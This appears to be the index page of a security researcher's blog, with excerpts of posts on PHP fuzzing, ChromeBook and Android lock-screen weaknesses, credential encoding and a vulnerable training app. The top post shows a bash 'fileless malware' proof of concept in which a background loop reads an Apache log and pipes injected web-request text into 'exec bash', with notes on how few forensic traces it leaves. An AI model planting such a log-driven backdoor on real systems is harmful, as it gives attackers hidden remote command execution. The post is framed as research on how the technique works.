2022-09-19 00:00:00
By Tim Brown
Had some fun today, playing with ideas for fileless malware in bash. The general premise of this idea is that we can start a background process that sits, monitors an existing log file and then executes code based on what appears in the logs. For example, consider the following:</p>
<pre>$ echo "while :; do grep "BAH~" /var/log/apache2/interesting.log | cut -f 2 -d \"~\" | tr '_' ' '; done" | exec bash</pre>
<p>Now, what happens if we make a request to the corresponding web server:</p>
<pre>$ wget --no-check-certificate 'https://interesting/?BAH~touch_/tmp/foo~'</pre>
<p>As far as forensic artefacts, there's not much to go on:</p>
<pre>$ wget --no-check-certificate 'https://interesting/?BAH~touch_/tmp/foo~' $ ps -aef
...
root 10680 10679 0 21:27 pts/1 00:00:00 /bin/bash
root 11125 10680 17 21:27 pts/1 00:00:02 bash
...
$ ls /proc/11125/fd
total 0
dr-x------ 2 root root 0 Jun 28 21:27 .
dr-xr-xr-x 9 root root 0 Jun 28 21:27 ..
lr-x------ 1 root root 64 Jun 28 21:28 0 -> pipe:[290558013]
lrwx------ 1 root root 64 Jun 28 21:28 1 -> /dev/pts/1
lrwx------ 1 root root 64 Jun 28 21:27 2 -> /dev/pts/1
$ cat /proc/11125/cmdline
bash
$ cat /proc/11125/cwd
/root</pre>
<p>Things like exec/disown/patterns/eval add some fun options for further obfuscation...</p>
<p>Note that the examples given here are somewhat is nobbled. Just in case anyone is confused, the point is rather the "| exec bash" rather than the payload specifics....
2017-03-17 02:30:01
By Tim Brown
It's been quite some time since I posted here but I thought I might try and resurrect this blog. Normal technical content will follow in due course but this post is a test of my new admin UI. Historically, Pontoon (and this site by extension) relied upon direct SQL updates, but I've just integrated http://crud-admin-generator.com/ which gives me a nice shiny UI from which I can make changes. Time will tell, but I'm hoping this will resurrect my interest in the platform....
2013-03-09 23:48:02
By Tim Brown
In my previous post on the Acer ChromeBook, I discussed the Crosh shell. Today I'm going to examine another default extension which I mentioned previously which had caught my eye....
2013-01-07 03:12:12
By Tim Brown
After some fairly heavy advertising from Google, I was recently persuaded to stump up the cash for an Acer ChromeBook. This post discusses some of my initial observations....
2012-12-02 02:59:06
By Tim Brown
Background: A colleague asked me about fuzzing PHP. Verbatim from my email to security@php.net back in 2007:
I've been doing some work on fuzzing the PHP 4 and PHP 5 parsers and wanted to share my results with you. I know PHP 4 won't be supported for much longer and I have no idea whether any of these examples are directly exploitable however before I make them public I thought it was only right to give you a chance to comment. Feel free to ignore me if you so choose, but I'll be putting them up on my blog in 14 days unless I hear otherwise. Although I'm reporting them against the CGI binary, I've had similar results running these snippets against the module too. In each case, I can cause the process (either the CGI binary or the module) to crash. The fuzzers I've written are also available if you so wish.
...
2012-09-19 09:21:29
By Tim Brown
Disclaimer: I've only had a brief look at 1.x so far and only under VMware. I do have a PlayBook which I'll be breaking in due course but right now it's still in the box. These notes have been floating around in one form or another privately for a while but I wanted to commit them publicly since I'm not sure when I will find time to continue playing....
2011-07-31 22:33:26
By Tim Brown
So recently I had a penetration test where the client had a requirement to allow normal users to execute a specific command as a local admin. Normally, when I hear such a requirement my eyes light up as it can often be a quick way to get SYSTEM and then the domain. However in this instance, the client proudly told me about his underhanded method. Rather than use something like psexec, he'd discovered a nifty little utility called cpau which purported to encode the credentials to make it safe for use by normal users. Red rag to a bull, I decided to take a look, perhaps the encoding was weak and I could retrieve those all important credentials....
2011-02-15 23:09:14
By Tim Brown
At the back end of last year I got a Sony Erricson X10 only to discover that it was still running Android 1.6. This didn't bother me too much at the time as it had all the features I was after (web, SMS and voice) and I left it as it was. Recently however I've been getting into Android security, inspired first by Nils talk at CRESTCon and more recently by some for a client. Anyway, throughout this time, I became aware of an issue that affects the X10. It seems that it is possible to bypass the pattern lock and gain access to data on a locked device. So how is this possible? Take a look at the following:...
2011-02-12 20:22:27
By Tim Brown
Recently myself and a colleague were asked to give some training to some ASP.net developers. My colleague was asked to give the main training session whilst I was asked to run a post training game to test the developers retention of the concepts. After looking at some of the existing ASP.net applications I decided I'd like to write my own. The result of this is VulnApp, a BSD licensed ASP.net application implementing some of the most common applications we come across on our penetration testing engagements. Whilst I'm not intending to package this up into a standalone install, today I committed the source to my CVS server so that others can, if they like, make use of it....